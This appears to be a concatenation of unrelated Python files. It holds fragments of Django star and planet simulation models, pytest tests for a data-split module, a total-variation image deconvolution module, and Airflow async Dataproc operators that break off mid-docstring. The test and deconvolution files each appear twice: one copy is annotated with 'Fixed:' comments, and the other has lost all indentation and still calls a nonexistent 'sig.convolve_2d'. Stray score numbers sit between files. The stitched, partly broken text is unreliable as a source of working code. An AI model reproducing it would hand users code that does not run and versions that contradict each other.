if not found_color:
if star.star_type and star.star_type.base_color:
found_color = star.star_type.base_color
star.base_color = found_color
star.save()
class Meta:
verbose_name_plural = 'Stars (Simulated)'
ordering = ['star']
def nearby_stars(self, force_regenerate=False):
if self.json_of_closest_stars and not force_regenerate:
star_list = json.loads(self.json_of_closest_stars)
else:
star_list = closest_stars(self, StarModel)
self.json_of_closest_stars = json.dumps(star_list)
self.save()
return star_list
def nearby_stars_json(self):
self.nearby_stars()
return self.json_of_closest_stars
def nearby_stars_json_force_recalc(self):
self.nearby_stars(force_regenerate=True)
return self.json_of_closest_stars
additional_methods = ['nearby_stars', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
val = self.__getattribute__(field)
if type(val) == Point:
point = dict()
point['x'] = val.x
point['y'] = val.y
point['z'] = val.z
dumps[str(field)] = point
else:
dumps[str(field)] = str(val)
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps
class PlanetType(models.Model):
"""
Planet Types (from http://en.wikipedia.org/wiki/List_of_planet_types)
"""
name = models.CharField(max_length=30, help_text="Short description", blank=True, null=True)
mass_range = models.CharField(max_length=30, help_text="Mass Range in sextillion tonnes (10^24. Earth=5.9)", blank=True, null=True)
radius_range = models.CharField(max_length=30, help_text="Radius Range in km (Earth=6371)", blank=True, null=True)
age_range = models.CharField(max_length=30, help_text="Age Range in million years (Earth=4540)", blank=True, null=True)
surface_area_range = models.CharField(max_length=30, help_text="Surface Area Range in million km^2 (Earth=510.1)", blank=True, null=True)
moon_range = models.CharField(max_length=30, help_text="Average number of moons (Earth=1)", blank=True, null=True)
density_range = models.CharField(max_length=30, help_text="Density Range in % (Earth=1)", blank=True, null=True)
length_days_range = models.CharField(max_length=30, help_text="Day Length Range in hours (Earth=24)", blank=True, null=True)
temperature_range = models.CharField(max_length=30, help_text="Temperature Range in C (Earth=15)", blank=True, null=True)
magnetic_field_range = models.CharField(max_length=30, help_text="Amount of magnetic field, 0 for none. (Earth=1, Jupiter=19519)", blank=True, null=True, default=0)
craterization_range = models.CharField(max_length=30, help_text="Amount of surface bombardment, 0 for none. (Earth=1)", blank=True, null=True, default=0)
mineral_surface = models.BooleanField(help_text="Is surface made of rock?", blank=True)
solid_core = models.BooleanField(help_text="Is core solid?", blank=True)
plate_tectonics = models.BooleanField(help_text="Is surface made of moving plates?", blank=True)
def __unicode__(self):
return '{0}'.format(self.name)
class Meta:
verbose_name_plural = 'Types of Planets'
class PlanetFeature(models.Model):
"""
Major features of a planetary body
"""
short_name = models.CharField(db_index=True, max_length=60, help_text="Short Description of Planetary Feature", blank=True, null=True)
details = models.TextField(help_text="Detailed Description of Planetary Feature", blank=True, null=True)
rules_required = models.TextField(help_text="What attributes of the planet must be true to have this feature?", blank=True, null=True)
rules_more_likely = models.TextField(help_text="What attributes of the planet double the chances to have this feature?", blank=True, null=True)
likelihood = models.FloatField(help_text="How likely is a planet to have this feature (0 to 1) given that the above are met?", blank=True, null=True, default="0.1")
class PlanetModel(models.Model):
    """
    Simulated Planets.

    One row per procedurally generated planet: physical characteristics,
    surface/atmosphere composition, orbital elements, and links to the parent
    star/planet and its notable features.
    """
    name = models.CharField(db_index=True, max_length=60, help_text="Planet Common Name", blank=True, null=True)
    planet_type = models.ForeignKey(PlanetType, help_text="Type of planet", default=1, blank=True, null=True)
    mass = models.FloatField(db_index=True, help_text="Estimated Mass (Earth=1, Mercury=.05, Mars=.1, Jupiter=317)", blank=True, null=True)
    radius = models.FloatField(help_text="Estimated Radius (Earth=1, Mercury=.382, Jupiter=10.97, Saturn=9.14) ", blank=True, null=True)
    density = models.FloatField(help_text="Density in g/cm^3 (Earth=5.51, Jupiter=1.33, Saturn=0.68, Pluto=1.75)", blank=True, null=True)
    gravity = models.FloatField(help_text="Surface Gravity (g=m/r^2, Earth=1, Mercury=0.38, Jupiter=2.53, Pluto=0.067)", blank=True, null=True)
    oblateness = models.FloatField(help_text="How squished it is (Earth=.0034, Venus=0, Saturn=.0979)", blank=True, null=True)
    tilt = models.FloatField(help_text="Axial Tilt (Earth=23.4, Uranus=97, Venus=177)", blank=True, null=True)
    albedo = models.FloatField(help_text="How much light does the surface reflect (0 to 1)", blank=True, null=True)
    length_days = models.FloatField(help_text="How many hours are the days (Earth=24)", blank=True, null=True)
    surface_temp_low = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
    # Fixed: help_text said "Low Temperature" (copy-paste of the field above).
    surface_temp_high = models.CharField(max_length=30, help_text="High Temperature in C", blank=True, null=True, default=0)
    magnetic_field = models.FloatField(help_text="How strong a magnetic field (Earth=1, Jupiter=19519)", blank=True, null=True)
    craterization = models.FloatField(help_text="How many craters? (Earth=1, Moon=2, Mars=3, Jupiter=0)", blank=True, null=True)
    #TODO: Figure out how to have a list of minerals and amounts that makes sense for coloring, mining, changing
    #TODO: Same for atmosphere gasses
    mineral_surface_early = models.FloatField(help_text="% Amount of H, He, C (0 to 1)", blank=True, null=True)
    mineral_surface_mid = models.FloatField(help_text="% Amount of N, O, Fe (0 to 1)", blank=True, null=True)
    mineral_surface_heavy = models.FloatField(help_text="% Amount of Heavier Metals (0 to 1)", blank=True, null=True)
    mineral_surface_late = models.FloatField(help_text="% Amount of Exotic Metals (0 to 1)", blank=True, null=True)
    minerals_specific = models.CharField(max_length=100, help_text="Comma-separated list of specific notable minerals", blank=True, null=True, default="")
    solid_core_size = models.FloatField(help_text="Percentage size of planet that is core (0 to 1, Earth=.31)", blank=True, null=True)
    solid_core_type = models.CharField(max_length=30, help_text="Type of Core", blank=True, null=True, default="Iron")
    plate_tectonics_amount = models.FloatField(help_text="Amount of tectonics and plate movement (Earth=1, Io=20)", blank=True, null=True)
    surface_solidity = models.FloatField(help_text="How solid is surface (Inner=1, Gas Giants=0)", blank=True, null=True)
    surface_ocean_amount = models.FloatField(help_text="% surface is covered with liquid (0 to 1, Earth=.71)", blank=True, null=True)
    # Fixed: help_text was missing its closing parenthesis.
    surface_ocean_chemicals = models.CharField(max_length=100, help_text="Main composition of surface oceans (Earth=Salt Water, Titan=Ethane and Methane)", blank=True, null=True, default="")
    subsurface_ocean_amount = models.FloatField(help_text="% of subsurface that is liquid (0 to 1, Europa=1.0)", blank=True, null=True)
    ice_amount_north_pole = models.FloatField(help_text="% North Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
    ice_amount_south_pole = models.FloatField(help_text="% South Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
    ice_amount_total = models.FloatField(help_text="% overall surface is covered with ice, not counting poles (0 to 1, Europa=1.0)", blank=True, null=True)
    semi_major_axis = models.FloatField(help_text="Semi-major Axis in au", blank=True, null=True)
    revolution = models.FloatField(help_text="Revolutions per earth day", blank=True, null=True)
    orbital_period = models.FloatField(help_text="Orbital Period in days", blank=True, null=True)
    orbital_eccentricity = models.FloatField(help_text="Orbital Eccentricity", blank=True, null=True)
    periastron = models.FloatField(help_text="Degrees of Periastron", blank=True, null=True)
    periastron_time = models.FloatField(help_text="Time of Periastron in JD", blank=True, null=True)
    velocity_semi_amplitude = models.FloatField(help_text="Semiamplitude of doppler variation", blank=True, null=True)
    ring_size = models.FloatField(help_text="Size of rings (as percentage of radius)", blank=True, null=True)
    ring_numbers = models.IntegerField(help_text="Number of ring groups", blank=True, null=True)
    atmosphere_millibars = models.FloatField(help_text="Pressure of atmosphere in Millibars (Mars=7, Earth=1013.25)", blank=True, null=True)
    atmosphere_main_gas = models.CharField(max_length=30, help_text="Major gas (70%), if any", blank=True, null=True)
    atmosphere_secondary_gas = models.CharField(max_length=30, help_text="Second gas (20%), if any", blank=True, null=True)
    atmosphere_tertiary_gas = models.CharField(max_length=30, help_text="Tertiary gas (9%), if any", blank=True, null=True)
    atmosphere_dust_amount = models.FloatField(help_text="Grams of dust/m^2 (Earth=1, Moon=1000, Mars=500)", blank=True, null=True)
    surface_wind_speeds_avg = models.FloatField(help_text="Average Wind Speeds in km/hr (Mars=108, Earth=17, Neptune=700)", blank=True, null=True)
    surface_wind_speeds_max = models.FloatField(help_text="Max Wind Speeds in km/hr (Mars=288, Earth=400, Neptune=2100)", blank=True, null=True)
    other_name = models.CharField(db_index=True, max_length=60, help_text="Alternate Planet Common Name", blank=True, null=True)
    parent_star = models.ForeignKey(Star, db_index=True, help_text="The star that it orbits", blank=True, null=True)
    parent_planet = models.ForeignKey('self', db_index=True, help_text="A planet that it orbits", blank=True, null=True)
    # Fixed: dropped null=True — it has no effect on ManyToManyField and
    # only triggers a Django system-check warning.
    major_features = models.ManyToManyField(PlanetFeature, help_text="What features are significant on this planet", blank=True)

    def __unicode__(self):
        """Display name, with the alternate name in brackets when present."""
        name = self.name
        if self.other_name:
            name = '{0} [{1}]'.format(self.name, self.other_name)
        return name

    class Meta:
        verbose_name_plural = 'Planets (Simulated)'
        ordering = ['name']

    # Methods whose results are always included by get_params() below.
    # (Kept at class level so ``self.additional_methods`` resolves.)
    additional_methods = ['__unicode__', ]

    def get_params(self, requested_methods=None, only_variables=None):
        """
        Converts parameters to object.

        Options:
            requested_methods = ['__unicode__', ] (to also call these functions and return results)
            only_variables = ['name', 'title', ] (to only return values of these model variables)

        :returns: dict of {field name: str(value)} plus one entry per method
            name in ``additional_methods`` mapped to that method's result.
        """
        additional_methods = list(self.additional_methods)
        if requested_methods:
            additional_methods = list(requested_methods) + additional_methods
        if only_variables:
            model_fields = only_variables
        else:
            model_fields = [field.name for field in self._meta.fields]
        # getattr is the idiomatic (and override-friendly) spelling of the
        # original self.__getattribute__ call.
        dumps = {str(field): str(getattr(self, field)) for field in model_fields}
        for func in additional_methods:
            dumps[func] = getattr(self, func)()
        return dumps
import pathlib
import tempfile
from ldp.parse import splits
import pytest
@pytest.fixture
def paths():
    """Yields fake (representation, annotation) path pair for testing.

    Fixed: ``pytest.yield_fixture`` is deprecated (and removed in modern
    pytest); a plain ``pytest.fixture`` supports ``yield`` identically.
    The temporary directory (and both touched files) is removed on teardown.
    """
    with tempfile.TemporaryDirectory() as tempdir:
        root = pathlib.Path(tempdir)
        representations = root / 'train_reps.h5'
        representations.touch()
        annotations = root / 'train_annotations.conll'
        annotations.touch()
        yield representations, annotations
def test_ensure(paths):
    """Test ensure returns correct Split tuple."""
    reps, annos = paths
    split = splits.ensure(reps, annos)
    assert split.representations == reps
    assert split.annotations == annos
def test_ensure_str_paths(paths):
    """Test ensure returns correct Split tuple when given string paths."""
    reps, annos = paths
    split = splits.ensure(str(reps), str(annos))
    assert split.representations == reps
    assert split.annotations == annos
@pytest.mark.parametrize('delete', (0, 1))
def test_ensure_bad_paths(paths, delete):
    """Test ensure explodes when one or more paths does not exist."""
    missing = paths[delete]
    missing.unlink()
    expected = f'.*not found: {missing}.*'
    with pytest.raises(FileNotFoundError, match=expected):
        splits.ensure(*paths)
@pytest.fixture
def representations_by_split(paths):
    """Returns dict mapping split key to fake representations paths."""
    train, _ = paths
    test = train.parent / 'test_reps.h5'
    test.touch()
    return {splits.TRAIN: train, splits.TEST: test}
@pytest.fixture
def annotations_by_split(paths):
    """Returns dict mapping split key to fake annotation paths."""
    _, train = paths
    test = train.parent / 'test_annotations.conll'
    test.touch()
    return {splits.TRAIN: train, splits.TEST: test}
def test_join(representations_by_split, annotations_by_split):
    """Test join produces correct splits in basic case."""
    joined = splits.join(representations_by_split, annotations_by_split)
    assert joined.keys() == {splits.TRAIN, splits.TEST}
    for key, split in joined.items():
        assert split.representations == representations_by_split[key]
        assert split.annotations == annotations_by_split[key]
def test_join_no_validate(representations_by_split, annotations_by_split):
    """Test join produces correct splits even when it does not validate."""
    # Remove one file; join must still succeed because validation is off.
    representations_by_split[splits.TRAIN].unlink()
    joined = splits.join(representations_by_split,
                         annotations_by_split,
                         validate=False)
    assert joined.keys() == {splits.TRAIN, splits.TEST}
    for key, split in joined.items():
        assert split.representations == representations_by_split[key]
        assert split.annotations == annotations_by_split[key]
@pytest.mark.parametrize('validate', (True, False))
def test_join_mismatched_keys(representations_by_split, annotations_by_split,
                              validate):
    """Test join dies when reps/anno dictionaries have different keys."""
    representations_by_split.pop(splits.TRAIN)
    with pytest.raises(ValueError, match='reps have splits.*'):
        splits.join(representations_by_split,
                    annotations_by_split,
                    validate=validate)
def test_join_with_root(representations_by_split, annotations_by_split):
    """Test join adjusts paths correctly when given root."""
    root = representations_by_split[splits.TRAIN].parent
    # Strip the fixtures down to bare file names so join has to re-root them.
    for key in (splits.TRAIN, splits.TEST):
        representations_by_split[key] = representations_by_split[key].name
        annotations_by_split[key] = annotations_by_split[key].name
    joined = splits.join(representations_by_split,
                         annotations_by_split,
                         root=root)
    assert joined.keys() == {splits.TRAIN, splits.TEST}
    for key, split in joined.items():
        assert split.representations == root / representations_by_split[key]
        assert split.annotations == root / annotations_by_split[key]
def test_join_bad_root(representations_by_split, annotations_by_split):
    """Test join validates root when validate=True."""
    bad_root = 'fake!'
    with pytest.raises(FileNotFoundError, match=f'.*root {bad_root}.*'):
        splits.join(representations_by_split, annotations_by_split,
                    root=bad_root)
def test_join_bad_root_no_validate():
    """Test join does not die when given bad root and validate=False."""
    root = pathlib.Path('root')
    reps = pathlib.Path('train.h5')
    annos = pathlib.Path('annotations.h5')
    joined = splits.join({splits.TRAIN: reps}, {splits.TRAIN: annos},
                         root=root,
                         validate=False)
    assert joined == {splits.TRAIN: splits.Split(root / reps, root / annos)}
import tempfile
from ldp.parse import splits
import pytest
@pytest.yield_fixture
def paths():
"""Yields fake (representation, annotation) path pair for testing."""
with tempfile.TemporaryDirectory() as tempdir:
root = pathlib.Path(tempdir)
representations = root / 'train_reps.h5'
representations.touch()
annotations = root / 'train_annotations.conll'
annotations.touch()
yield representations, annotations
def test_ensure(paths):
"""Test ensure returns correct Split tuple."""
representations, annotations = paths
actual = splits.ensure(representations, annotations)
assert actual.representations == representations
assert actual.annotations == annotations
def test_ensure_str_paths(paths):
"""Test ensure returns correct Split tuple when given string paths."""
representations, annotations = paths
actual = splits.ensure(str(representations), str(annotations))
assert actual.representations == representations
assert actual.annotations == annotations
@pytest.mark.parametrize('delete', (0, 1))
def test_ensure_bad_paths(paths, delete):
"""Test ensure explodes when one or more paths does not exist."""
deleted = paths[delete]
deleted.unlink()
with pytest.raises(FileNotFoundError, match=f'.*not found: {deleted}.*'):
splits.ensure(*paths)
@pytest.fixture
def representations_by_split(paths):
"""Returns dict mapping split key to fake representations paths."""
train_reps, _ = paths
test_reps = train_reps.parent / 'test_reps.h5'
test_reps.touch()
return {splits.TRAIN: train_reps, splits.TEST: test_reps}
@pytest.fixture
def annotations_by_split(paths):
"""Returns dict mapping split key to fake annotation paths."""
_, train_annotations = paths
test_annotations = train_annotations.parent / 'test_annotations.conll'
test_annotations.touch()
return {splits.TRAIN: train_annotations, splits.TEST: test_annotations}
def test_join(representations_by_split, annotations_by_split):
"""Test join produces correct splits in basic case."""
actual = splits.join(representations_by_split, annotations_by_split)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
def test_join_no_validate(representations_by_split, annotations_by_split):
"""Test join produces correct splits even when it does not validate."""
representations_by_split[splits.TRAIN].unlink()
actual = splits.join(representations_by_split,
annotations_by_split,
validate=False)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
@pytest.mark.parametrize('validate', (True, False))
def test_join_mismatched_keys(representations_by_split, annotations_by_split,
validate):
"""Test join dies when reps/anno dictionaries have different keys."""
del representations_by_split[splits.TRAIN]
with pytest.raises(ValueError, match='reps have splits.*'):
splits.join(representations_by_split,
annotations_by_split,
validate=validate)
def test_join_with_root(representations_by_split, annotations_by_split):
"""Test join adjusts paths correctly when given root."""
root = representations_by_split[splits.TRAIN].parent
for key in (splits.TRAIN, splits.TEST):
representations_by_split[key] = representations_by_split[key].name
annotations_by_split[key] = annotations_by_split[key].name
actual = splits.join(representations_by_split,
annotations_by_split,
root=root)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == root / representations_by_split[key]
assert split.annotations == root / annotations_by_split[key]
def test_join_bad_root(representations_by_split, annotations_by_split):
"""Test join validates root when validate=True."""
root = 'fake!'
with pytest.raises(FileNotFoundError, match=f'.*root {root}.*'):
splits.join(representations_by_split, annotations_by_split, root=root)
def test_join_bad_root_no_validate():
"""Test join does not die when given bad root and validate=False."""
root = pathlib.Path('root')
reps = pathlib.Path('train.h5')
annos = pathlib.Path('annotations.h5')
actual = splits.join({splits.TRAIN: reps}, {splits.TRAIN: annos},
root=root,
validate=False)
assert actual == {splits.TRAIN: splits.Split(root / reps, root / annos)} | 0.770119 | 0.731754 |
__author__ = '<NAME>'
__email__ = '<EMAIL>'
import numpy as np
import scipy.signal as sig
from skimage.filters import gaussian
from tv_fista import deconvolve_fista
def deconvolve_tv(image, psf, noise_level=0.05, min_value=0, max_value=1,
                  intermediate_it=30, it=40, intermediate_eps=1e-3, eps=1e-5):
    """Computes the total variation regularized deconvolution of a given image,
    with the point spread function psf. This is computed using the FISTA
    method [2] and the framework derived in [3].

    :param image: Image to deconvolve.
    :param psf: Point spread function to invert.
    :param noise_level: Regularization parameter, higher means noisier data.
    :param min_value: Minimum pixel intensity.
    :param max_value: Maximum pixel intensity.
    :param intermediate_it: Iterations per proximal gradient computation.
    :param it: No. of FISTA iterations.
    :param intermediate_eps: Convergence level of proximal gradient computation.
    :param eps: Convergence level deconvolution iterations.
    :returns: Deconvoluted image.
    """
    # The adjoint of convolution with `psf` is convolution with the kernel
    # rotated by 180 degrees.
    psf_adjoint = np.rot90(psf, 2)
    # Fixed: scipy.signal has no `convolve_2d`; the 2-D routine is named
    # `convolve2d`, so the original lambdas raised AttributeError when first
    # invoked. Also renamed to stop shadowing the builtin `filter`.
    apply_filter = lambda x: sig.convolve2d(x, psf, mode='same')
    apply_adjoint = lambda x: sig.convolve2d(x, psf_adjoint, mode='same')
    return deconvolve_fista(image, apply_filter, apply_adjoint, noise_level,
                            it=it, intermediate_it=intermediate_it, eps=eps,
                            intermediate_eps=intermediate_eps,
                            min_value=min_value, max_value=max_value,
                            lipschitz=find_lipschitz(
                                image,
                                lambda x: apply_adjoint(apply_filter(x))))
def easy_gaussian_denoise(image, std, noise_level=0.05, min_value=0,
                          max_value=1, intermediate_it=30, it=40,
                          intermediate_eps=1e-3, eps=1e-5, lipschitz=None,
                          message=True):
    """Warning: Slow! Each iteration performs total variation deblurring.

    Total variation regularized deconvolution of ``image`` with a gaussian
    blurring kernel of the given standard deviation, via the FISTA method [2],
    the framework of [3], and the restarting scheme of [4].

    :param image: Image to deblur.
    :param std: Standard deviation (radius) of the gaussian blurring kernel
        to invert.
    :param noise_level: Regularization parameter - Almost always less than 1.
    :param min_value: Minimum pixel value.
    :param max_value: Maximum pixel value.
    :param intermediate_it: Iterations per proximal gradient computation.
    :param it: No. of FISTA iterations.
    :param intermediate_eps: Convergence level of proximal gradient computation.
    :param eps: Convergence level deconvolution iterations.
    :param lipschitz: Use higher than standard Lipschitz bound for the
        convolution gradient functional.
    :param message: Show information during iterations.
    :return: Deblurred image.
    """
    # Default Lipschitz bound of 2 unless the caller supplied a truthy value.
    if not lipschitz:
        lipschitz = 2
    blur = lambda x: gaussian(x, std)
    # A gaussian kernel is symmetric, so the filter serves as its own adjoint.
    return deconvolve_fista(image, blur, blur, noise_level,
                            it=it, intermediate_it=intermediate_it, eps=eps,
                            intermediate_eps=intermediate_eps,
                            min_value=min_value, max_value=max_value,
                            lipschitz=lipschitz, message=message)
def find_lipschitz(x0, operator):
    """Use power iterations to find the Lipschitz constant of a linear
    operator O: V -> V. To find the Lipschitz constant for the gradient of:
        ||Ax - b||,
    with linear operator A, constant vector b and variable x, one has to
    compute the Lipschitz constant of the operator [A'A].

    :param x0: Initial vector x0 (any array-like; converted to a float copy,
        so the caller's data is never modified).
    :param operator: Function that corresponds to the operator, takes one
        vector as argument and returns a vector of the same size.
    :returns: Lipschitz constant of the operator, returns 1.1 if the
        Lipschitz constant is less than 1.1 (for stability reasons).
    :raises ValueError: If ``x0`` is the zero vector — power iteration
        cannot start from it (the original silently produced NaNs and
        returned 1.1 in that case).
    """
    # Fixed: work on a float copy. The in-place division below raised
    # TypeError for integer input arrays, and np.copy alone kept the dtype.
    vec = np.asarray(x0, dtype=float).copy()
    lip = np.linalg.norm(vec)
    if lip == 0:
        raise ValueError("find_lipschitz requires a nonzero starting vector")
    for _ in range(20):
        vec /= lip                  # normalize before each application
        vec = operator(vec)
        lip = np.linalg.norm(vec)   # current estimate of the top eigenvalue
    return lip if lip > 1.1 else 1.1
__email__ = '<EMAIL>'
import numpy as np
import scipy.signal as sig
from skimage.filters import gaussian
from tv_fista import deconvolve_fista
def deconvolve_tv(image, psf, noise_level=0.05, min_value=0, max_value=1,
intermediate_it=30, it=40, intermediate_eps=1e-3, eps=1e-5):
"""Computes the total variation regularized deconvolution of a given image,
with the point spread function psf. This is computed using the FISTA
method [2] and the framework derived in [3].
:param image: Image to deconvolve.
:param psf: Point spread function to invert.
:param noise_level: Regularization parameter, higher means noisier data.
:param min_value: Minimum pixel intensity.
:param max_value: Maximum pixel intensity.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:returns: Deconvoluted image.
"""
psf_adjoint = np.rot90(psf, 2)
filter = lambda x: sig.convolve_2d(x, psf, mode='same')
adjoint_filter = lambda x: sig.convolve_2d(x, psf_adjoint, mode='same')
return deconvolve_fista(image, filter, adjoint_filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=find_lipschitz(image,
lambda x: adjoint_filter(filter(x))))
def easy_gaussian_denoise(image, std, noise_level=0.05, min_value=0,
max_value=1, intermediate_it=30, it=40,
intermediate_eps=1e-3, eps=1e-5, lipschitz=None,
message=True):
"""Warning: Slow! Each iteration performs total variation deblurring.
Performs total variation regularized deconvolution of image with a
gaussian blurring kernel that has given standard deviation. This is
performed using the FISTA method [2] and the framework derived in [3] as
well as a restarting scheme as described in [4].
:param image: Image to deblur.
:param std: Standard deviation (radius) of the gaussian blurring kernel
to invert.
:param noise_level: Regularization parameter - Almost always less than 1.
:param min_value: Minimum pixel value.
:param max_value: Maximum pixel value.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:param lipschitz: Use higher than standard Lipschitz bound for the
convolution gradient funcitonal.
:param message: Show information during iterations
:return: Deblurred image
"""
lipschitz = 2 if not lipschitz else lipschitz
filter = lambda x: gaussian(x, std)
return deconvolve_fista(image, filter, filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=lipschitz, message=message)
def find_lipschitz(x0, operator):
"""Use power iterations to find the Lipschitz constant of a linear
operator O: V -> V. To find the Lipschitz constant for the gradient of:
||Ax - b||,
with linear operator A, constant vector b and variable x, one has to
compute the Lipschitz constant of the operator [A'A].
:param x0: Initial vector x0.
:param operator: Function that corresponds to the operator, takes one
vector as argument and returns a vector of the same size.
:returns: Lipschitz constant of the operator, returns 1.1 if the
Lipschitz constant is less than 1.1 (for stability reasons)."""
x0 = np.copy(x0)
lip = np.linalg.norm(x0)
for i in range(20):
x0 /= lip
x0 = operator(x0)
lip = np.linalg.norm(x0)
return lip if lip > 1.1 else 1.1 | 0.891964 | 0.716913 |
import time
from typing import Any, Dict, Optional
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.dataproc import DataprocHook
from airflow.providers.google.cloud.links.dataproc import (
DATAPROC_CLUSTER_LINK,
DataprocLink,
)
from airflow.providers.google.cloud.operators.dataproc import (
DataprocCreateClusterOperator,
DataprocDeleteClusterOperator,
DataprocSubmitJobOperator,
DataprocUpdateClusterOperator,
)
from airflow.utils.context import Context
from google.api_core.exceptions import AlreadyExists
from astronomer.providers.google.cloud.triggers.dataproc import (
DataprocCreateClusterTrigger,
DataprocDeleteClusterTrigger,
DataProcSubmitTrigger,
)
class DataprocCreateClusterOperatorAsync(DataprocCreateClusterOperator):
    """
    Create a new cluster on Google Cloud Dataproc Asynchronously.

    :param project_id: The ID of the google cloud project in which
        to create the cluster. (templated)
    :param cluster_name: Name of the cluster to create
    :param labels: Labels that will be assigned to created cluster
    :param cluster_config: Required. The cluster config to create.
        If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.cloud.dataproc_v1.types.ClusterConfig`
    :param virtual_cluster_config: Optional. The virtual cluster config, used when creating a Dataproc
        cluster that does not directly control the underlying compute resources, for example, when creating a
        `Dataproc-on-GKE cluster
        <https://cloud.google.com/dataproc/docs/concepts/jobs/dataproc-gke#create-a-dataproc-on-gke-cluster>`
    :param region: The specified region where the dataproc cluster is created.
    :param delete_on_error: If true the cluster will be deleted if created with ERROR state. Default
        value is true.
    :param use_if_exists: If true use existing cluster
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
        first ``google.longrunning.Operation`` created and stored in the backend is returned.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status
    """

    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        super().__init__(**kwargs)
        # Seconds between status polls performed by the deferral trigger.
        self.polling_interval = polling_interval

    def execute(self, context: Context) -> None:  # type: ignore[override]
        """Call create cluster API and defer to DataprocCreateClusterTrigger to check the status"""
        hook = DataprocHook(gcp_conn_id=self.gcp_conn_id)
        # Persist the Dataproc console link up front so it is visible in the
        # UI even while the task is deferred.
        DataprocLink.persist(
            context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
        )
        try:
            hook.create_cluster(
                region=self.region,
                project_id=self.project_id,
                cluster_name=self.cluster_name,
                cluster_config=self.cluster_config,
                labels=self.labels,
                request_id=self.request_id,
                retry=self.retry,
                timeout=self.timeout,
                metadata=self.metadata,
            )
        except AlreadyExists:
            # Re-raise unless the caller opted into reusing an existing
            # cluster via ``use_if_exists``.
            if not self.use_if_exists:
                raise
            self.log.info("Cluster already exists.")
        # Fixed: ``self.timeout`` may be None (meaning "no API timeout"), in
        # which case ``time.monotonic() + self.timeout`` raised TypeError.
        # Mirror the 24-hour fallback used by DataprocDeleteClusterOperatorAsync
        # for the trigger deadline only; the hook call above still receives the
        # caller's original value.
        deadline: float = self.timeout if self.timeout is not None else 24 * 60 * 60
        end_time: float = time.monotonic() + deadline
        self.defer(
            trigger=DataprocCreateClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                end_time=end_time,
                metadata=self.metadata,
                delete_on_error=self.delete_on_error,
                cluster_config=self.cluster_config,
                labels=self.labels,
                gcp_conn_id=self.gcp_conn_id,
                polling_interval=self.polling_interval,
            ),
            method_name="execute_complete",
        )

    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.
        """
        if event and event["status"] == "success":
            self.log.info("Cluster created successfully \n %s", event["data"])
            return event["data"]
        elif event and event["status"] == "error":
            raise AirflowException(event["message"])
        raise AirflowException("No event received in trigger callback")
class DataprocDeleteClusterOperatorAsync(DataprocDeleteClusterOperator):
    """
    Delete a cluster on Google Cloud Dataproc Asynchronously.

    :param region: Required. The Cloud Dataproc region in which to handle the request (templated).
    :param cluster_name: Required. The cluster name (templated).
    :param project_id: Optional. The ID of the Google Cloud project that the cluster belongs to (templated).
    :param cluster_uuid: Optional. Specifying the ``cluster_uuid`` means the RPC should fail
        if cluster with specified UUID does not exist.
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
        first ``google.longrunning.Operation`` created and stored in the backend is returned.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
